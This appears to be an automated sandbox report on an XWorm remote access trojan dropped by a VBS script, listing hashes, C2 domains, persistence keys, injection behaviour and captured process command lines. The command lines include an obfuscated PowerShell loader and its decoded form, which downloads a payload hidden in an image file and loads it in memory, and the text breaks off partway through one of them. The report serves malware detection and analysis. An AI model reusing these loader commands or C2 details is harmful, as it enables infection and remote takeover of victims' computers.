xworm | 7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8

Analysis

max time kernel
146s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 01:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8.vbs
Size

155KB
MD5

b280a8bc4f8a6540a76abf5a10195e51
SHA1

833903eb2385c0703ba081eb24c3b6654859452b
SHA256

7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8
SHA512

6bbf9ada7d0af0c366a96b8b626dbb9479c02e24c3005403bfe890c8ac268cd9bef2b641ff266745521779907757acfaa44dcd106ace2ebe3ae0bfe9b6d104ec
SSDEEP

1536:IbruDZJuZJd99CObitCocEW1aJK66n5yhtW0/5JpWnQcoVd9owng0B3bUZlu9gIo:sruDZJuZJdI9JK6X/fcoVd99ng0B3cn

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

mayxw9402.duckdns.org:9402

xwormay9090.duckdns.org:9090

Mutex

ZyV5MqKosTk3Hzpr

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1924-33-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm
behavioral2/memory/2096-125-0x0000000001000000-0x000000000100E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Detects Windows executables referencing non-Windows User-Agents 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1924-33-0x0000000000400000-0x0000000000410000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/2096-124-0x0000000001000000-0x0000000002254000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA
behavioral2/memory/2096-125-0x0000000001000000-0x000000000100E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

Blocklisted process makes network request 12 IoCs

Processes:

WScript.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
3	1948	WScript.exe
7	1948	WScript.exe
9	1948	WScript.exe
18	1424	powershell.exe
35	1424	powershell.exe
64	3500	powershell.exe
67	1520	powershell.exe
95	5428	powershell.exe
97	6612	powershell.exe
100	6612	powershell.exe
103	6612	powershell.exe
108	6612	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

1396 powershell.exe
1424 powershell.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeRegAsm.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

RegAsm.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk	RegAsm.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk	RegAsm.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\decaprotia.vbs"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%ambuscades% -w 1 $Quantized202=(Get-ItemProperty -Path 'HKCU:\\Nordmanden\\').Guldstole;%ambuscades% ($Quantized202)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 pastebin.com
3 pastebin.com
Suspicious use of NtCreateThreadExHideFromDebugger 3 IoCs

Processes:

wab.exewab.exewab.exe

pid process

2096 wab.exe
3244 wab.exe
6520 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

powershell.exewab.exepowershell.exewab.exepowershell.exepowershell.exewab.exewab.exe

pid process

2544 powershell.exe
2096 wab.exe
2500 powershell.exe
3244 wab.exe
7164 powershell.exe
5976 powershell.exe
6520 wab.exe
4964 wab.exe

flow	ioc
1	pastebin.com
3	pastebin.com

pid	process
2096	wab.exe
3244	wab.exe
6520	wab.exe

pid	process
2544	powershell.exe
2096	wab.exe
2500	powershell.exe
3244	wab.exe
7164	powershell.exe
5976	powershell.exe
6520	wab.exe
4964	wab.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1424 set thread context of 1924	1424	powershell.exe	RegAsm.exe
PID 2544 set thread context of 2096	2544	powershell.exe	wab.exe
PID 2500 set thread context of 3244	2500	powershell.exe	wab.exe
PID 7164 set thread context of 4964	7164	powershell.exe	wab.exe
PID 5976 set thread context of 6520	5976	powershell.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

Processes:

RegAsm.exewab.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	RegAsm.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3760 reg.exe

pid	process
3760	reg.exe

Suspicious behavior: EnumeratesProcesses 33 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1396	powershell.exe
1396	powershell.exe
1424	powershell.exe
1424	powershell.exe
1924	RegAsm.exe
3500	powershell.exe
3500	powershell.exe
1520	powershell.exe
1520	powershell.exe
2544	powershell.exe
2544	powershell.exe
2500	powershell.exe
2500	powershell.exe
2544	powershell.exe
2500	powershell.exe
2096	wab.exe
7164	powershell.exe
7164	powershell.exe
5428	powershell.exe
5428	powershell.exe
6612	powershell.exe
6612	powershell.exe
7164	powershell.exe
7164	powershell.exe
6612	powershell.exe
5976	powershell.exe
5976	powershell.exe
5976	powershell.exe
4612	powershell.exe
4612	powershell.exe
4612	powershell.exe
5976	powershell.exe
4612	powershell.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2544 powershell.exe
2500 powershell.exe
7164 powershell.exe
5976 powershell.exe

pid	process
2544	powershell.exe
2500	powershell.exe
7164	powershell.exe
5976	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1396	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	1924	RegAsm.exe
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	2500	powershell.exe
Token: SeDebugPrivilege	2096	wab.exe
Token: SeDebugPrivilege	3244	wab.exe
Token: SeDebugPrivilege	7164	powershell.exe
Token: SeDebugPrivilege	5428	powershell.exe
Token: SeDebugPrivilege	6612	powershell.exe
Token: SeDebugPrivilege	5976	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

RegAsm.exewab.exe

pid process

1924 RegAsm.exe
2096 wab.exe

pid	process
1924	RegAsm.exe
2096	wab.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exeRegAsm.exeWScript.exepowershell.exeWScript.exepowershell.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 1948 wrote to memory of 1396	1948	WScript.exe	powershell.exe
PID 1948 wrote to memory of 1396	1948	WScript.exe	powershell.exe
PID 1396 wrote to memory of 1424	1396	powershell.exe	powershell.exe
PID 1396 wrote to memory of 1424	1396	powershell.exe	powershell.exe
PID 1424 wrote to memory of 2404	1424	powershell.exe	cmd.exe
PID 1424 wrote to memory of 2404	1424	powershell.exe	cmd.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1424 wrote to memory of 1924	1424	powershell.exe	RegAsm.exe
PID 1924 wrote to memory of 1880	1924	RegAsm.exe	WScript.exe
PID 1924 wrote to memory of 1880	1924	RegAsm.exe	WScript.exe
PID 1924 wrote to memory of 1880	1924	RegAsm.exe	WScript.exe
PID 1924 wrote to memory of 3408	1924	RegAsm.exe	WScript.exe
PID 1924 wrote to memory of 3408	1924	RegAsm.exe	WScript.exe
PID 1924 wrote to memory of 3408	1924	RegAsm.exe	WScript.exe
PID 1880 wrote to memory of 3500	1880	WScript.exe	powershell.exe
PID 1880 wrote to memory of 3500	1880	WScript.exe	powershell.exe
PID 1880 wrote to memory of 3500	1880	WScript.exe	powershell.exe
PID 3500 wrote to memory of 4400	3500	powershell.exe	cmd.exe
PID 3500 wrote to memory of 4400	3500	powershell.exe	cmd.exe
PID 3500 wrote to memory of 4400	3500	powershell.exe	cmd.exe
PID 3408 wrote to memory of 1520	3408	WScript.exe	powershell.exe
PID 3408 wrote to memory of 1520	3408	WScript.exe	powershell.exe
PID 3408 wrote to memory of 1520	3408	WScript.exe	powershell.exe
PID 1520 wrote to memory of 4840	1520	powershell.exe	cmd.exe
PID 1520 wrote to memory of 4840	1520	powershell.exe	cmd.exe
PID 1520 wrote to memory of 4840	1520	powershell.exe	cmd.exe
PID 3500 wrote to memory of 2544	3500	powershell.exe	powershell.exe
PID 3500 wrote to memory of 2544	3500	powershell.exe	powershell.exe
PID 3500 wrote to memory of 2544	3500	powershell.exe	powershell.exe
PID 1520 wrote to memory of 2500	1520	powershell.exe	powershell.exe
PID 1520 wrote to memory of 2500	1520	powershell.exe	powershell.exe
PID 1520 wrote to memory of 2500	1520	powershell.exe	powershell.exe
PID 2544 wrote to memory of 2932	2544	powershell.exe	cmd.exe
PID 2544 wrote to memory of 2932	2544	powershell.exe	cmd.exe
PID 2544 wrote to memory of 2932	2544	powershell.exe	cmd.exe
PID 2500 wrote to memory of 3080	2500	powershell.exe	cmd.exe
PID 2500 wrote to memory of 3080	2500	powershell.exe	cmd.exe
PID 2500 wrote to memory of 3080	2500	powershell.exe	cmd.exe
PID 2544 wrote to memory of 2096	2544	powershell.exe	wab.exe
PID 2544 wrote to memory of 2096	2544	powershell.exe	wab.exe
PID 2544 wrote to memory of 2096	2544	powershell.exe	wab.exe
PID 2544 wrote to memory of 2096	2544	powershell.exe	wab.exe
PID 2544 wrote to memory of 2096	2544	powershell.exe	wab.exe
PID 2096 wrote to memory of 1352	2096	wab.exe	cmd.exe
PID 2096 wrote to memory of 1352	2096	wab.exe	cmd.exe
PID 2096 wrote to memory of 1352	2096	wab.exe	cmd.exe
PID 1352 wrote to memory of 3760	1352	cmd.exe	reg.exe
PID 1352 wrote to memory of 3760	1352	cmd.exe	reg.exe
PID 1352 wrote to memory of 3760	1352	cmd.exe	reg.exe
PID 2500 wrote to memory of 3244	2500	powershell.exe	wab.exe
PID 2500 wrote to memory of 3244	2500	powershell.exe	wab.exe
PID 2500 wrote to memory of 3244	2500	powershell.exe	wab.exe
PID 2500 wrote to memory of 3244	2500	powershell.exe	wab.exe
PID 2500 wrote to memory of 3244	2500	powershell.exe	wab.exe
PID 2096 wrote to memory of 5652	2096	wab.exe	WScript.exe
PID 2096 wrote to memory of 5652	2096	wab.exe	WScript.exe
PID 2096 wrote to memory of 5652	2096	wab.exe	WScript.exe
PID 2096 wrote to memory of 5624	2096	wab.exe	WScript.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7977dcda33f70efcfde7817d3a54fb1ad6a41b97842c709a699c10747df4ede8.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTredwB4DgTreHkDgTreYQBtDgTreC8DgTreYQByDgTreGEDgTreegDgTrevDgTreGcDgTrecgBvDgTreC4DgTreZQBjDgTreG4DgTreZQBpDgTreGMDgTrecwBsDgTreGEDgTrebgBvDgTreGkDgTredDgTreBhDgTreHDgTreDgTredQBjDgTreGMDgTrebwBqDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGQDgTreZQBjDgTreGEDgTrecDgTreByDgTreG8DgTredDgTreBpDgTreGEDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = 